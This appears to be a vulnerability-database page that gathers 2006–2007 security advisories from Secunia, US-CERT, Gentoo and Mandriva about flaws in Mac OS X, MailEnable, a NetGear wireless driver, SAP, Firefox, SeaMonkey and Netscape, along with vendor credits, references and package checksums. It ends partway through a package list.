VARIoT IoT vulnerabilities database

Apple Mac OS X allows local users to cause a denial of service (memory corruption) via a crafted Mach-O binary with a malformed load_command data structure. Apple Mac OS X is prone to privilege-escalation vulnerability. This issue occurs when the operating system fails to handle specially crafted binaries. A successful exploit would allow a local attacker to execute arbitrary code with kernel-level privileges. A successful exploit would lead to the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition

Apple Mac OS X kernel allows local users to cause a denial of service via a process that uses kevent to register a queue and an event, then fork a child process that uses kevent to register an event for the same queue as the parent. Apple Mac OS X CoreText contains an uninitialized pointer vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. Exploiting this issue allows local, unprivileged users to crash affected kernels, denying further service to legitimate users. Apple Mac OS X version 10.4.8 is vulnerable to this issue; other versions may also be affected. ---------------------------------------------------------------------- 2003: 2,700 advisories published 2004: 3,100 advisories published 2005: 4,600 advisories published 2006: 5,300 advisories published How do you know which Secunia advisories are important to you? The Secunia Vulnerability Intelligence Solutions allows you to filter and structure all the information you need, so you can address issues effectively. Get a free trial of the Secunia Vulnerability Intelligence Solutions: http://corporate.secunia.com/how_to_buy/38/vi/?ref=secadv ---------------------------------------------------------------------- TITLE: Apple Mac OS X Security Update Fixes Multiple Vulnerabilities SECUNIA ADVISORY ID: SA27643 VERIFY ADVISORY: http://secunia.com/advisories/27643/ CRITICAL: Highly critical IMPACT: Security Bypass, Cross Site Scripting, Spoofing, Exposure of sensitive information, Privilege escalation, DoS, System access WHERE: >From remote OPERATING SYSTEM: Apple Macintosh OS X http://secunia.com/product/96/ DESCRIPTION: Apple has issued a security update for Mac OS X, which fixes multiple vulnerabilities. 1) Multiple errors within the Adobe Flash Player plug-in can be exploited by malicious people to gain knowledge of sensitive information or compromise a user's system. For more information: SA26027 2) A null-pointer dereference error exists within AppleRAID when handling disk images. This can be exploited to cause a system shutdown when a specially crafted disk image is mounted e.g. automatically via Safari if the option "Open 'safe' files after downloading" is enabled. 3) An error in BIND can be exploited by malicious people to poison the DNS cache. For more information: SA26152 4) An error in bzip2 can be exploited to cause a DoS (Denial of Service). For more information: SA15447 This also fixes a race condition when setting file permissions. 5) An unspecified error in the implementation of FTP of CFNetwork can be exploited by a malicious FTP server to cause the client to connect to other hosts by sending specially crafted replies to FTP PASV (passive) commands. 6) An unspecified error exists in the validation of certificates within CFNetwork. This can be exploited via a Man-in-the-Middle (MitM) attack to spoof a web site with a trusted certificate. 7) A null pointer dereference error in the CFNetwork framework can lead to an unexpected application termination when a vulnerable application connects to a malicious server. 8) A boundary error in CoreFoundation can be exploited to cause a one-byte buffer overflow when a user is enticed to read a specially crafted directory hierarchy. Successful exploitation allows execution of arbitrary code. 9) An error exists in CoreText due to the use of an uninitialised pointer and can be exploited to execute arbitrary code when a user is tricked into reading a specially crafted text. 10) Some vulnerabilities in Kerberos can be exploited by malicious users and malicious people to compromise a vulnerable system. For more information: SA26676 11) An error in the handling of the current Mach thread port or thread exception port in the Kernel can be exploited by a malicious, local user to execute arbitrary code with root privileges. Successful exploitation requires permission to execute a setuid binary. 12) An unspecified error in the Kernel can be exploited to bypass the chroot mechanism by changing the working directory using a relative path. 13) An integer overflow error in the "i386_set_ldt" system call can be exploited by malicious, local users to execute arbitrary code with escalated privileges. 14) An error exists in the handling of standard file descriptors while executing setuid and setgid programs. This can be exploited by malicious, local users to gain system privileges by executing setuid programs with the standard file descriptors in an unexpected state. 15) An integer overflow exists in the Kernel when handling ioctl requests. This can be exploited to execute arbitrary code with system privileges by sending a specially crafted ioctl request. 16) The default configuration of tftpd allows clients to access any path on the system. 17) An error in the Node Information Query mechanism may allow a remote user to query for all addresses of a host, including link-local addresses. 18) An integer overflow exists in the handling of ASP messages with AppleTalk. This can be exploited by malicious, local users to cause a heap-based buffer overflow and to execute arbitrary code with system privileges by sending a maliciously crafted ASP message on an AppleTalk socket. 19) A double-free error in the handling of certain IPV6 packets can potentially be exploited to execute arbitrary code with system privileges. 20) A boundary error exists when adding a new AppleTalk zone. This can be exploited to cause a stack-based buffer overflow by sending a maliciously crafted ioctl request to an AppleTalk socket and allows execution of arbitrary code with system privileges. 21) An arithmetic error exists in AppleTalk when handling memory allocations. This can be exploited by malicious, local users to cause a heap-based buffer overflow and execute arbitrary code with system privileges by sending a maliciously crafted AppleTalk message. 22) A double free error in NFS exists when processing an AUTH_UNIX RPC call. This can be exploited by malicious people to execute arbitrary code by sending a maliciously crafted AUTH_UNIX RPC call via TCP or UDP. 23) An unspecified case-sensitivity error exists in NSURL when determining if a URL references the local file system. 24) A format string error in Safari can be exploited by malicious people to execute arbitrary code when a user is tricked into opening a .download file with a specially crafted name. 25) An implementation error exists in the tabbed browsing feature of Safari. If HTTP authentication is used by a site being loaded in a tab other than the active tab, an authentication sheet may be displayed although the tab and its corresponding page are not visible. 26) A person with physical access to a system may be able to bypass the screen saver authentication dialog by sending keystrokes to a process running behind the screen saver authentication dialog. 27) Safari does not block "file://" URLs when loading resources. This can be exploited to view the content of local files by enticing a user to visit a specially crafted web page. 28) An input validation error exists in WebCore when handling HTML forms. This can be exploited to alter the values of form fields by enticing a user to upload a specially crafted file. 29) A race condition error exists in Safari when handling page transitions. This can be exploited to obtain information entered in forms on other web sites by enticing a user to visit a malicious web page. 30) An unspecified error exists in the handling of the browser's history. This can be exploited to execute arbitrary code by enticing a user to visit a specially crafted web page. 31) An error in Safari allows malicious websites to set Javascript window properties of websites served from a different domain. This can be exploited to get or set the window status and location of pages served from other websites by enticing a user to visit a specially crafted web page. 32) An error in Safari allows a malicious website to bypass the same origin policy by hosting embedded objects with javascript URLs. This can be exploited to execute arbitrary HTML and script code in context of another site by enticing a user to visit a specially crafted web page. 33) An error in Safari allows content served over HTTP to alter or access content served over HTTPS in the same domain. This can be exploited to execute Javascript code in context of HTTPS web pages in that domain when a user visits a malicious web page. 34) An error in Safari in the handling of new browser windows can be exploited to disclose the URL of an unrelated page. For more information see vulnerability #2 in: SA23893 35) An error in WebKit may allow unauthorised applications to access private keys added to the keychain by Safari. 36) An unspecified error in Safari may allow a malicious website to send remotely specified data to arbitrary TCP ports. 37) WebKit/Safari creates temporary files insecurely when previewing a PDF file, which may allow a local user to access the file's content. 5) The vendor credits Dr Bob Lopez PhD. 6) The vendor credits Marko Karppinen, Petteri Kamppuri, and Nikita Zhuk of MK&C. 9) Will Dormann, CERT/CC 11) An anonymous person, reported via iDefense Labs. 12) The vendor credits Johan Henselmans and Jesper Skov. 13) The vendor credits RISE Security. 14) The vendor credits Ilja van Sprundel. 15) The vendor credits Tobias Klein, www.trapkit.de 16) The vendor credits James P. Javery, Stratus Data Systems 17) The vendor credits Arnaud Ebalard, EADS Innovation Works. 18, 21) Sean Larsson, iDefense Labs 19) The vendor credits Bhavesh Davda of VMware and Brian "chort" Keefer of Tumbleweed Communications. 20) An anonymous person, reported via iDefense Labs. 22) The vendor credits Alan Newson of NGSSoftware, and Renaud Deraison of Tenable Network Security, Inc. 25) The vendor credits Michael Roitzsch, Technical University Dresden. 26) The vendor credits Faisal N. Jawdat 27) The vendor credits lixlpixel. 28) The vendor credits Bodo Ruskamp, Itchigo Communications GmbH. 29) The vendor credits Ryan Grisso, NetSuite. 30) The vendor credits David Bloom. 31, 32) The vendor credits Michal Zalewski, Google Inc. 33) The vendor credits Keigo Yamazaki of LAC Co. 36) The vendor credits Kostas G. Anagnostakis, Institute for Infocomm Research and Spiros Antonatos, FORTH-ICS 37) The vendor credits Jean-Luc Giraud, and Moritz Borgmann of ETH Zurich. ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=307041 US-CERT VU#498105: http://www.kb.cert.org/vuls/id/498105 iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=630 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=629 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=627 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=628 OTHER REFERENCES: SA15447: http://secunia.com/advisories/15447/ SA23893: http://secunia.com/advisories/23893/ SA26027: http://secunia.com/advisories/26027/ SA26152: http://secunia.com/advisories/26152/ SA26676: http://secunia.com/advisories/26676/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . I. Further details are available in the related vulnerability notes. II. Impact The impacts of these vulnerabilities vary. Potential consequences include remote execution of arbitrary code or commands, bypass of security restrictions, and denial of service. III. This and other updates are available via Apple Update or via Apple Downloads. IV. Please send email to <cert@cert.org> with "TA07-319A Feedback VU#498105" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2007 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History November 15, 2007: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRzx7ZvRFkHkM87XOAQJfIQgAmTZfjJAY/QTweUmvZtOJ9JQ4e/Gj0sE9 OPSrK/SplP92WUL1Ucb8I/VUSQEXXJhNv9dTCMcy7IMpqhx4UxPA6fBKWDJ+nUFi sx/60EOAiIVW+yYK79VdoI1jrSs48E+CNdqEJCQcjUCVi29eGAdW63H2jOZV37/F 4iQBZYRqhiycZ9FS+S+9aRfMhfy8dEOr1UwIElq6X/tSwss1EKFSNrK5ktGifUtB AJ+LJVBt2yZOIApcGhsxC3LYUDrDfhqGLIVM2XBc1yuV7Y2gaH4g9Txe+fWK79X2 LYHvhv2xtgLweR12YC+0hT60wSdrDTM6ZW0//ny25LZ7Y7D46ogSWQ== =AgEr -----END PGP SIGNATURE-----

Multiple stack-based buffer overflows in the IMAP module (MEIMAPS.EXE) in MailEnable Professional 1.6 through 1.82 and 2.0 through 2.33, and MailEnable Enterprise 1.1 through 1.30 and 2.0 through 2.33 allow remote authenticated users to cause a denial of service (crash) or possibly execute arbitrary code via a long argument to the (1) EXAMINE or (2) SELECT command. MailEnable is a commercial POP3 and SMTP server. MailEnable has a vulnerability in handling user requests. MailEnable is prone to multiple buffer-overflow vulnerabilities in the IMAP service because the application fails to properly bounds-check various types of user-supplied data. This issues are reported to affect the following MailEnable versions, but other versions may also be vulnerable: 1.6-1.86 Professional Edition 1.1-1.40 Enterprise Edition 2.0-2.33 Professional Edition 2.0-2.33 Enterprise Edition. ---------------------------------------------------------------------- To improve our services to our customers, we have made a number of additions to the Secunia Advisories and have started translating the advisories to German. The improvements will help our customers to get a better understanding of how we reached our conclusions, how it was rated, our thoughts on exploitation, attack vectors, and scenarios. This includes: * Reason for rating * Extended description * Extended solution * Exploit code or links to exploit code * Deep links Read the full description: http://corporate.secunia.com/products/48/?r=l Contact Secunia Sales for more information: http://corporate.secunia.com/how_to_buy/15/?r=l ---------------------------------------------------------------------- TITLE: MailEnable IMAP Service Buffer Overflow Vulnerability SECUNIA ADVISORY ID: SA23047 VERIFY ADVISORY: http://secunia.com/advisories/23047/ CRITICAL: Highly critical IMPACT: DoS, System access WHERE: >From remote SOFTWARE: MailEnable Enterprise Edition 1.x http://secunia.com/product/4325/ MailEnable Enterprise Edition 2.x http://secunia.com/product/10427/ MailEnable Professional 2.x http://secunia.com/product/10625/ MailEnable Professional 1.x http://secunia.com/product/3474/ DESCRIPTION: A vulnerability has been reported in MailEnable IMAP service, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system. Successful exploitation may allow execution of arbitrary code. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.mailenable.com/hotfix/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Heap-based buffer overflow in the wireless driver (WG311ND5.SYS) 2.3.1.10 for NetGear WG311v1 wireless adapter allows remote attackers to execute arbitrary code via an 802.11 management frame with a long SSID. Successful exploitation of this vulnerability may allow an attacker to execute arbitrary code, or cause a denial-of-service condition. Failed attempts will likely crash the kernel, resulting in denial-of-service conditions. Although the WG311v1ND5.SYS driver is used primarily on Microsoft Windows, users of Linux and BSD machines running the 'ndiswrapper' tool should determine if they are using a vulnerable instance of the driver. Version 2.3.1.10 of the WG311v1ND5.SYS driver is vulnerable to this issue; other versions may also be affected. WG311 is a 54M wireless PCI card. Remote attackers can trigger this vulnerability by sending specially crafted packets, which may result in denial of service or execution of arbitrary commands. The problem exists in the WG311ND5.SYS driver, which is reproduced on Windows systems, but Linux and FreeBSD may also be affected by similar vulnerabilities. ---------------------------------------------------------------------- To improve our services to our customers, we have made a number of additions to the Secunia Advisories and have started translating the advisories to German. The improvements will help our customers to get a better understanding of how we reached our conclusions, how it was rated, our thoughts on exploitation, attack vectors, and scenarios. The vulnerability is caused due to a boundary error in the WG311ND5.SYS device driver when handling long SSIDs. This can be exploited to cause a heap-based buffer overflow via a specially crafted packet. SOLUTION: Turn off the wireless card when not in use. PROVIDED AND/OR DISCOVERED BY: Laurent Butti ORIGINAL ADVISORY: http://projects.info-pull.com/mokb/MOKB-22-11-2006.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

SAP allows remote attackers to obtain potentially sensitive information such as operating system and SAP version via an RFC_SYSTEM_INFO RfcCallReceive request, a different vulnerability than CVE-2003-0747

Unspecified vulnerability in SAP Web Application Server before 6.40 patch 6 allows remote attackers to cause a denial of service (enserver.exe crash) via a certain UDP packet to port 64999, aka "two bytes UDP crash," a different vulnerability than CVE-2006-5785

The (1) Password Manager in Mozilla Firefox 2.0, and 1.5.0.8 and earlier; and the (2) Passcard Manager in Netscape 8.1.2 and possibly other versions, do not properly verify that an ACTION URL in a FORM element containing a password INPUT element matches the web site for which the user stored a password, which allows remote attackers to obtain passwords via a password INPUT element on a different web page located on the web site intended for this password. Mozilla According to, there have been reports of phishing cases where this password manager issue was exploited. Mozilla Firefox is reportedly prone to an information-disclosure weakness because it fails to properly notify users of the automatic population of form fields in disparate URLs deriving from the same domain. Exploiting this issue may allow attackers to obtain user credentials that have been saved in forms deriving from the same website where attack code resides. The most common manifestation of this condition would typically be in blogs or forums. This may allow attackers to access potentially sensitive information that would facilitate the success of phishing attacks. Initial reports and preliminary testing indicate that this issue affects only Firefox 2. UPDATE: Firefox 2.0.0.10 is still vulnerable to the issue. UPDATE (March 17, 2008): Unconfirmed reports indicate that this issue affects Firefox 2.0.0.12; we will update this BID as more information emerges. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200703-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: SeaMonkey: Multiple vulnerabilities Date: March 09, 2007 Bugs: #165555 ID: 200703-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been reported in SeaMonkey, some of which may allow user-assisted arbitrary remote code execution. Background ========== The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as the 'Mozilla Application Suite'. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-client/seamonkey < 1.1.1 >= 1.1.1 2 www-client/seamonkey-bin < 1.1.1 >= 1.1.1 ------------------------------------------------------------------- 2 affected packages on all of their supported architectures. ------------------------------------------------------------------- Description =========== Tom Ferris reported a heap-based buffer overflow involving wide SVG stroke widths that affects SeaMonkey. Various researchers reported some errors in the JavaScript engine potentially leading to memory corruption. SeaMonkey also contains minor vulnerabilities involving cache collision and unsafe pop-up restrictions, filtering or CSS rendering under certain conditions. All those vulnerabilities are the same as in GLSA 200703-04 affecting Mozilla Firefox. Impact ====== An attacker could entice a user to view a specially crafted web page or to read a specially crafted email that will trigger one of the vulnerabilities, possibly leading to the execution of arbitrary code. It is also possible for an attacker to spoof the address bar, steal information through cache collision, bypass the local file protection mechanism with pop-ups, or perform cross-site scripting attacks, leading to the exposure of sensitive information, such as user credentials. Workaround ========== There is no known workaround at this time for all of these issues, but most of them can be avoided by disabling JavaScript. Note that the execution of JavaScript is disabled by default in the SeaMonkey email client, and enabling it is strongly discouraged. Resolution ========== Users upgrading to the following release of SeaMonkey should note that the corresponding Mozilla Firefox upgrade has been found to lose the saved passwords file in some cases. The saved passwords are encrypted and stored in the 'signons.txt' file of ~/.mozilla/ and we advise our users to save that file before performing the upgrade. All SeaMonkey users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/seamonkey-1.1.1" All SeaMonkey binary users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/seamonkey-bin-1.1.1" References ========== [ 1 ] CVE-2006-6077 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6077 [ 2 ] CVE-2007-0775 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775 [ 3 ] CVE-2007-0776 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0776 [ 4 ] CVE-2007-0777 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777 [ 5 ] CVE-2007-0778 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0778 [ 6 ] CVE-2007-0779 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0779 [ 7 ] CVE-2007-0780 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0780 [ 8 ] CVE-2007-0800 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0800 [ 9 ] CVE-2007-0801 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0801 [ 10 ] CVE-2007-0981 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981 [ 11 ] CVE-2007-0995 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0995 [ 12 ] Mozilla Password Loss Bug https://bugzilla.mozilla.org/show_bug.cgi?id=360493#c366 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. Try it out online: http://secunia.com/software_inspector/ ---------------------------------------------------------------------- TITLE: Netscape Multiple Vulnerabilities SECUNIA ADVISORY ID: SA24289 VERIFY ADVISORY: http://secunia.com/advisories/24289/ CRITICAL: Highly critical IMPACT: Security Bypass, Cross Site Scripting, Exposure of sensitive information, System access WHERE: >From remote SOFTWARE: Netscape 8.x http://secunia.com/product/5134/ DESCRIPTION: Multiple vulnerabilities have been reported in Netscape, which can be exploited by malicious people to bypass certain security restrictions, gain knowledge of sensitive information, conduct cross-site scripting attacks, or potentially compromise a user's system. See vulnerabilities #1, #2, #6, and #7 for more information: SA24205 The vulnerabilities have been reported in version 8.1.2. SOLUTION: Do not browse untrusted sites and disable Javascript. ORIGINAL ADVISORY: http://www.mozilla.org/security/announce/2007/mfsa2007-02.html http://www.mozilla.org/security/announce/2007/mfsa2007-03.html http://www.mozilla.org/security/announce/2007/mfsa2007-06.html http://www.mozilla.org/security/announce/2007/mfsa2007-07.html OTHER REFERENCES: SA24175: http://secunia.com/advisories/24175/ SA24205: http://secunia.com/advisories/24205/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6077 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0008 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0009 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0778 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0779 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0780 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0800 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0995 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0996 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1092 http://www.mozilla.org/security/announce/2007/mfsa2007-01.html http://www.mozilla.org/security/announce/2007/mfsa2007-02.html http://www.mozilla.org/security/announce/2007/mfsa2007-03.html http://www.mozilla.org/security/announce/2007/mfsa2007-04.html http://www.mozilla.org/security/announce/2007/mfsa2007-05.html http://www.mozilla.org/security/announce/2007/mfsa2007-06.html http://www.mozilla.org/security/announce/2007/mfsa2007-07.html http://www.mozilla.org/security/announce/2007/mfsa2007-08.html _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: 779d995c3a792726d31c8949cbcbdb0f 2007.0/i586/deskbar-applet-2.16.0-3.4mdv2007.0.i586.rpm c982a6ed061d42aad0b6cc9019fb7d8e 2007.0/i586/devhelp-0.12-5.4mdv2007.0.i586.rpm 9f908e3aef38bc911688950c27c6ae0e 2007.0/i586/devhelp-plugins-0.12-5.4mdv2007.0.i586.rpm 88acffbb16c2b9e46af5cd85dacef441 2007.0/i586/epiphany-2.16.0-4.4mdv2007.0.i586.rpm fc5788820dc6e81e6fb9c5ddcb3d5a84 2007.0/i586/epiphany-devel-2.16.0-4.4mdv2007.0.i586.rpm 3e1096c6c731fd5c6bd3d91d3c3d5855 2007.0/i586/epiphany-extensions-2.16.0-3.4mdv2007.0.i586.rpm 48c2d19aafdf980094e218c24c32d302 2007.0/i586/galeon-2.0.1-8.4mdv2007.0.i586.rpm ad09aec53a7be271d93930f67a167067 2007.0/i586/gnome-python-extras-2.14.2-6.4mdv2007.0.i586.rpm ce09aae8a13da1d2994683db30f23ba6 2007.0/i586/gnome-python-gdl-2.14.2-6.4mdv2007.0.i586.rpm 8d2c71404a72ca7da85c3c6168b64653 2007.0/i586/gnome-python-gksu-2.14.2-6.4mdv2007.0.i586.rpm ec461c06d55d705d88856bcde85ce3e0 2007.0/i586/gnome-python-gtkhtml2-2.14.2-6.4mdv2007.0.i586.rpm 676fd9eb0b9bd70ca624fe36effd3829 2007.0/i586/gnome-python-gtkmozembed-2.14.2-6.4mdv2007.0.i586.rpm 4ec8be6938ec72ed4fd3047a3ce90c5f 2007.0/i586/gnome-python-gtkspell-2.14.2-6.4mdv2007.0.i586.rpm 8e046ecef73c723e91800d8909c70d8e 2007.0/i586/libdevhelp-1_0-0.12-5.4mdv2007.0.i586.rpm f64440840bc63dcfcfe30d544c1f9927 2007.0/i586/libdevhelp-1_0-devel-0.12-5.4mdv2007.0.i586.rpm 0de477b1bfc21ea84605bbf869773ac7 2007.0/i586/libmozilla-firefox1.5.0.10-1.5.0.10-1mdv2007.0.i586.rpm 1cac2d46475b2bb3e7b0d5f9338bcc8a 2007.0/i586/libmozilla-firefox1.5.0.10-devel-1.5.0.10-1mdv2007.0.i586.rpm a15b72381007bb5b7134e1fd0f15e816 2007.0/i586/libnspr4-1.5.0.10-1mdv2007.0.i586.rpm 3b1945bab290c52a069e40721f33c0f9 2007.0/i586/libnspr4-devel-1.5.0.10-1mdv2007.0.i586.rpm c468bd0ca67481408ab3368a13256bf3 2007.0/i586/libnspr4-static-devel-1.5.0.10-1mdv2007.0.i586.rpm 7a6029a9d000391f06272853cb19eb24 2007.0/i586/libnss3-1.5.0.10-1mdv2007.0.i586.rpm 431ec0bc112c599829563a10b113a4bc 2007.0/i586/libnss3-devel-1.5.0.10-1mdv2007.0.i586.rpm 31550304857a0077aa6e5785a4398a28 2007.0/i586/libtotem-plparser1-2.16.1-2.4mdv2007.0.i586.rpm 54e06b8f410a0e305836f8feb6d39896 2007.0/i586/libtotem-plparser1-devel-2.16.1-2.4mdv2007.0.i586.rpm 4aba2c01b46521f6799f2e7824b32a11 2007.0/i586/mozilla-firefox-1.5.0.10-1mdv2007.0.i586.rpm 5176f852d83cc4e52cf8670a4bb4e62b 2007.0/i586/mozilla-firefox-ar-1.5.0.10-1mdv2007.0.i586.rpm 29d69114b4ceae5e4b5b20a17fbff66f 2007.0/i586/mozilla-firefox-bg-1.5.0.10-1mdv2007.0.i586.rpm b5af23354127de177f118f689a3a08f9 2007.0/i586/mozilla-firefox-br-1.5.0.10-1mdv2007.0.i586.rpm 2aea7763c52275f9ff098c13a72710a5 2007.0/i586/mozilla-firefox-ca-1.5.0.10-1mdv2007.0.i586.rpm 2d16ba5dace98e04574909e18014ebee 2007.0/i586/mozilla-firefox-cs-1.5.0.10-1mdv2007.0.i586.rpm 68978bc64af267ae2e9a2834d87f31fa 2007.0/i586/mozilla-firefox-da-1.5.0.10-1mdv2007.0.i586.rpm fe1a4d17e001a7d949511a9f33b3c1e2 2007.0/i586/mozilla-firefox-de-1.5.0.10-1mdv2007.0.i586.rpm ca021d4e6d26e45d3ad136641a122a55 2007.0/i586/mozilla-firefox-el-1.5.0.10-1mdv2007.0.i586.rpm 5e965a88bf1539df3b879d0c93b6ed62 2007.0/i586/mozilla-firefox-es-1.5.0.10-1mdv2007.0.i586.rpm 019cb4ecf0a605e9eae901e85f1e01d8 2007.0/i586/mozilla-firefox-es_AR-1.5.0.10-1mdv2007.0.i586.rpm 7a6b3b8fba400fd5605c76f32664b307 2007.0/i586/mozilla-firefox-eu-1.5.0.10-1mdv2007.0.i586.rpm 28dcdeeeacc84c3ae9db1047254593f6 2007.0/i586/mozilla-firefox-fi-1.5.0.10-1mdv2007.0.i586.rpm c2cb1b4a96c3928347e571afa4c3e1e4 2007.0/i586/mozilla-firefox-fr-1.5.0.10-1mdv2007.0.i586.rpm 4076b5ef0f5b8f39e7021954b159152b 2007.0/i586/mozilla-firefox-fy-1.5.0.10-1mdv2007.0.i586.rpm 9a931e411eb1afa49f74c254f1fbfc2e 2007.0/i586/mozilla-firefox-ga-1.5.0.10-1mdv2007.0.i586.rpm ba925c55f95bbb33ac4d66f78f763003 2007.0/i586/mozilla-firefox-gu_IN-1.5.0.10-1mdv2007.0.i586.rpm 32dfcda703145db25e231ef1af7d2d9a 2007.0/i586/mozilla-firefox-he-1.5.0.10-1mdv2007.0.i586.rpm 55b02f6e8479ec0f8a451d4cb75270df 2007.0/i586/mozilla-firefox-hu-1.5.0.10-1mdv2007.0.i586.rpm f7015e40b9f7c2b16f21828c4ec47054 2007.0/i586/mozilla-firefox-it-1.5.0.10-1mdv2007.0.i586.rpm d70b264f2bcfdf858ad3f482b1f21c27 2007.0/i586/mozilla-firefox-ja-1.5.0.10-1mdv2007.0.i586.rpm 34c0037322a9a24d8cb9da18639c6527 2007.0/i586/mozilla-firefox-ko-1.5.0.10-1mdv2007.0.i586.rpm 3ce3659834d3405c8a1cc405df1091a5 2007.0/i586/mozilla-firefox-lt-1.5.0.10-1mdv2007.0.i586.rpm 218d07922e4ff1e188ee82f0d68641b2 2007.0/i586/mozilla-firefox-mk-1.5.0.10-1mdv2007.0.i586.rpm 0997b2dbc249d94d45da83941b29039d 2007.0/i586/mozilla-firefox-nb-1.5.0.10-1mdv2007.0.i586.rpm 5270b3907aefaf97947208e83fc3d9d1 